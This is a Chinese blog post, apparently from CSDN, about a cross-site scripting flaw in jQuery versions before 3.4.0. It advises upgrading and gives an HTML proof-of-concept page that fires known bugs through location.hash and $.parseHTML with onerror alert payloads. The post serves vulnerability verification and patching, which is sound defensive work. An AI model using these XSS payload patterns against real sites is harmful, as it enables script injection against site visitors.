JQuery跨站脚本漏洞

已于 2024-04-02 15:59:25 修改
阅读量579 收藏 4
点赞数 11
文章标签: jquery 前端 javascript
于 2024-04-02 15:55:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq274575499/article/details/137272214
版权

漏洞描述:

jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。

jQuery 3.4.0之前版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。

危害级别:

解决方案:更新jQuery到最新版本:如果是由于jQuery的旧版本中存在漏洞,那么升级到最新版本可以修复这个问题。

漏洞验证:

1、使用Dude Suite访问目标站点,数据监视栏得到jQuery版本。

2、使用如下验证代码,保存为html格式。需要修改第9行,src="http://你的URL:端口号/Scripts/jquery-1.8.2.min.js"中“你的URL:端口号”为要测试的url,修改"jquery-1.8.2.min.js"为自己要验证的js版本。

<!DOCTYPE html>
<html lang="zh">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Jquery XSS</title>
    <script type="text/javascript" src="http://你的URL:端口号/Scripts/jquery-1.8.2.min.js"></script>
    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.9.1/jquery.js"></script> -->
    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.11.1/jquery.js"></script> -->
    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.12.1/jquery.js"></script> -->
    <script>
        $(function () {
            // #9521
            // #11290
            $(location.hash);

            // #11974
            $('#bug').on('click', function () {
                $.parseHTML("<img src='z' onerror='alert(\"bug-11974\")'>");
                return false;
            });
        })
    </script>
</head>

<body>
    <h1>jQuery with XSS</h1>
    <h2>Demo:</h2>
    <p style="color:red;">Note: Source code changes jQuery version,As long as there is no bullet window, there will be no problem.!</p>
    <ul>
        <li><a href="#<img src=/ onerror=alert(1)>" target="_blank">bug-9521</a> => <a
                href="https://bugs.jquery.com/ticket/9521" target="_blank">ticket</a></li>
        <li><a href="#p[class='<img src=/ onerror=alert(2)>']" target="_blank">bug-11290</a> => <a
                href="https://bugs.jquery.com/ticket/11290" target="_blank">ticket</a></li>
        <li><a href="#11974" id="bug">bug-11974</a> => <a href="https://bugs.jquery.com/ticket/11974"
                target="_blank">ticket</a></li>
    </ul>
    <h2>Test version:</h2>
    <ul>
        <li><a href="http://research.insecurelabs.org/jquery/test/" target="_blank">test result</a></li>
    </ul>
    <h2>Safe version:</h2>
    <ul>
        <li>1.12.0, 1.12.1 </li>
        <li>2.2.0, 2.2.1</li>
        <li>3.0.0, 3.0.1, 3.1.0, 3.1.1, 3.2.0, 3.2.1, 3.3.0, 3.3.1, 3.4.0, 3.4.1, 3.5.0, 3.5.1</li>
    </ul>
</body>

</html>

3、保存上面代码后用浏览器打开。

可以看到Demo下面有三个bug-*

4、验证:可以依次点击这三个bug-9521 bug-11290 bug-11974,看看哪个会弹窗,我这里是 jQuery v1.8.2 的版本,在点击 bug-11974 发生了弹窗,说明此版本的漏洞被验证成功了。

5、也可以点击页面中的 test version下的 test result,来判断自己版本的 jQuery 版本存在的 bug 编号,例如这里的 jQuery v2.1.4 版本就对应着bug-2432和 bug-11974。

QYpiying
关注
  • 11
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
jQuery Mobile漏洞会有跨站脚本攻击风险
12-11
概述 根据国外媒体的最新报道,谷歌公司的安全工程师Eduardo Vela在jQuery Mobile框架中发现了一个安全漏洞,这个漏洞将会让 所有使用了jQuery Mobile的网站暴露于跨站脚本攻击风险之下 。 jQuery Mobile项目(jQuery框架中的一个组件)是一个基于HTML5的开发框架,在它的帮助下,开发者可以设计出能够适配目前主流移动设备和桌面系统的响应式Web站点以及应用程序。实际上,jQuery Mobile不仅可以为主流移动平台提供jQuery的核心库,而且它也是一个较为完整统一的jQuery移动UI框架。根据jQuery开发团队的介绍,目前全球范围内大约有十五
跨站脚本漏洞(XSS)示例
04-15
NULL 博文链接:https://songjianyong.iteye.com/blog/1754973
jQuery导致的XSS跨站漏洞
weixin_45908624的博客
11-17 5103
jQuery导致的XSS跨站漏洞
漏洞危害及修复建议
m0_71300782的博客
09-12 906
SQL 注入攻击是指攻击者通过向 Web 应用程序的输入框中插入恶意 SQL 语句来执行未经授权的操作。导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
jQuery 解决低版本安全漏洞 并兼容旧版写法及依赖老插件
joe0235的博客
02-23 4939
jQuery 解决低版本安全漏洞 兼容旧版写法及依赖老插件
360提示[高危]使用存在漏洞JQuery版本的解决方法
10-19
今天用360检测网站,提示高危]使用存在漏洞JQuery版本,说是这个文件有问题jquery.min.js,这里脚本之家小编就为大家分享一下解决方法
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
漏洞笔记】jQuery跨站脚本
TeamsSix 的 CSDN 空间
11-20 1918
0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 关于jQueryjQuery是美国程序员John Resig所研发的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 漏洞原理:jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 locat...
jQuery跨站脚本漏洞
weixin_50464560的博客
08-21 2162
原理:     jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞 影响版本:     jquery-1.7.1~1.8.3    jquery-1.6.min.jsjquery-1.6.1.min.jsjquery-1.6.2.min...
Jquery-1.8.3中的BUG
wttyzy的专栏
02-02 4607
ie和firefox一直遇到这个问题 ---------------------------------------------------------------------------------- |   typeError:elem.nodeName.toLowerCase is not a function  | -------------------------------
【应用安全——XSS】DOM型XSS挖掘
Fly_鹏程万里
02-22 1780
DOM-Based XSS是一种基于文档对象模型(Document Object Model,DOM)的Web前端漏洞,简单来说就是JavaScript代码缺陷造成的漏洞。与普通XSS不同的是,DOM XSS是在浏览器的解析中改变页面DOM树,且恶意代码并不在返回页面源码中回显,这使我们无法通过特征匹配来检测DOM XSS。 0x01 页面跳转 页面跳转中常用的三种方式: 1)302跳转 ...
jQuery漏洞复现整理
热门推荐
网安君的博客
02-23 1万+
平时Acunetix会扫出来很多 Vulnerable JavaScript libraries中危漏洞JavaScript一般存在的都是XSS漏洞,那么如何去在报告中体现出这个漏洞呢,具体内容如下文。 JavaScript XSS Demo <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta name="viewport" content="wid
WEB漏洞-XSS跨站脚本漏洞解决方案
踮脚敲代码
01-11 4450
一、测试过程 通过手工测试,构造用户可控参数访问,发现网站部分页面对用户可控参数未做过滤限制,存在XSS跨站脚本漏洞,测试如下: POST /task/notepad/insertNotepad HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,e
关于在线文本编辑器防XSS注入攻击问题
weixin_30443731的博客
02-07 1499
跨站脚本攻击,又称XSS代码攻击,也是一种常见的脚本注入攻击。例如在下面的界面上,很多输入框是可以随意输入内容的,特别是一些文本编辑框里面,可以输入例如<script>alert('这是一个页面弹出警告');</script>这样的内容,如果在一些首页出现很多这样内容,而又不经过处理,那么页面就不断的弹框,更有甚者,在里面执行一个无限循环的脚本函数,直到页面耗尽资...
JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现】
一纸荒芜的博客
10-31 8043
jquery-xss漏洞复现
xss 跨站脚本攻击漏洞修复
最新发布
qq_38322989的博客
11-24 532
【代码】xss 跨站脚本攻击漏洞修复。
SpringBoot 解决跨站脚本漏洞(XSS)问题
ideal-lingyun
06-25 2615
SpringBoot 解决跨站脚本漏洞(XSS)问题
jquery跨站脚本漏洞
09-02
jQuery是一种广泛应用于网页开发的JavaScript库。然而,由于其普遍性,jQuery也存在一些安全漏洞,其中之一是跨站脚本攻击(XSS)。 跨站脚本攻击是指攻击者利用网页中的漏洞来注入恶意脚本代码,从而窃取用户敏感信息或者对用户进行各种不良操作。而jQuery跨站脚本漏洞主要是由于其在处理用户输入时,没有充分验证用户输入的安全性。 这种漏洞的利用方式大致分为两种:一种是对用户输入的数据进行恶意修改,然后以用户的身份执行一些不被授权的操作;另一种是实施钓鱼攻击,诱骗用户点击看似正常的链接,实际上触发了一段恶意代码。 为了防止jQuery跨站脚本漏洞,我们可以采取以下几个措施: 1. 对用户输入的数据进行严格的验证和过滤,确保输入的内容符合预期的格式和类型,并且不包含恶意代码。 2. 在使用jQuery提供的DOM操作方法时,尽量避免使用innerHTML、outerHTML等操作,可以使用text()、html()等方法来代替,以避免恶意修改DOM结构。 3. 在使用jQuery的AJAX功能时,要注意对返回的数据进行严格的验证和过滤,确保不包含恶意代码。 4. 及时更新jQuery库,以获取最新的安全补丁和修复漏洞。 5. 强制开启CSP(内容安全策略),限制网页中外部资源的加载,避免引入可疑的脚本文件。 总之,要防止jQuery跨站脚本漏洞,我们需要在代码编写和用户输入处理上加入更多的安全措施,确保用户的信息安全和网页的正常运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QYpiying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值